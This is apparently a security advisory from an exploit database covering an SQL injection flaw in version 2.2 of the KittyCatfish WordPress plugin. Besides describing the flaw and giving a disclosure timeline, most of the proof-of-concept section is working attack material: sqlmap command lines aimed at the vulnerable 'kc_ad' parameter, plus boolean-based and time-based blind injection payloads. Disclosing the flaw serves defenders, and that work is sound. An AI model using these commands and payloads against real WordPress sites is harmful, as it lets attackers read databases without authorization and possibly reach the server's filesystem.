# Exploit Title: KittyCatfish 2.2 Plugin for WordPress - SQL Injection# Date: 20/03/2017# Exploit Author: TAD GROUP# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/# Software Link: https://wordpress.org/plugins-wp/kittycatfish/# Version: 2.2# Contact: info[at]tad.group# Website: https://tad.group# Category: Web Application Exploits1. Description
An unescaped parameter was found in KittyCatfish version 2.2(WP plugin). An attacker can exploit this vulnerability to read from the database.
The get oarameter 'kc_ad'is vulnerable.2. Proof of concept
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""—dbms —threads=10 —random-agent
OR
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql —level 5 —risk=3
Parameter: kc_ad (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kc_ad=31 AND 2281=2281&ver=2.0
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind (SELECT)
Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.03. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.4. Impact
Critical
5. Affected versions
<=2.26. Disclosure timeline
06-Mar-2017- found the vulnerability
06-Mar-2017- informed the developer
20-Mar-2017- release date of this security advisory
Not fixed at the date of submitting this exploit.
